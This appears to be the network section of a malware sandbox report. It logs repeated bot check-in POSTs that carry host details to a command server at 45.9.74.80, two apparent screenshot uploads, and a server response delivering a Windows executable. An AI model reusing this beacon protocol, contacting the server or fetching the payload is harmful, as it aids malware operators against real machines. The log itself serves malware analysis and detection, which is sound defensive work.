                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTAxNDY3Host: 45.9.74.80Content-Length: 101619Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTY5MjY=Host: 45.9.74.80Content-Length: 97078Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 May 2023 08:42:33 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40Last-Modified: Sun, 28 May 2023 08:40:04 GMTETag: "c3e00-5fcbceaa1bec3"Accept-Ranges: bytesContent-Length: 802304Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 26 ff f6 9e 62 9e 98 cd 62 9e 98 cd 62 9e 98 cd 7c cc 0d cd 7f 9e 98 cd 7c cc 1b cd 18 9e 98 cd 7c cc 1c cd 48 9e 98 cd 45 58 e3 cd 6b 9e 98 cd 62 9e 99 cd ea 9e 98 cd 7c cc 12 cd 63 9e 98 cd 7c cc 0c cd 63 9e 98 cd 7c cc 09 cd 63 9e 98 cd 52 69 63 68 62 9e 98 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d0 34 fa 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 4e 0a 00 00 28 26 00 00 00 00 00 59 4e 00 00 00 10 00 00 00 60 0a 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 a0 30 00 00 04 00 00 01 83 0c 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 88 51 0a 00 64 00 00 00 00 c0 2e 00 98 93 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 30 00 e4 0d 00 00 20 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 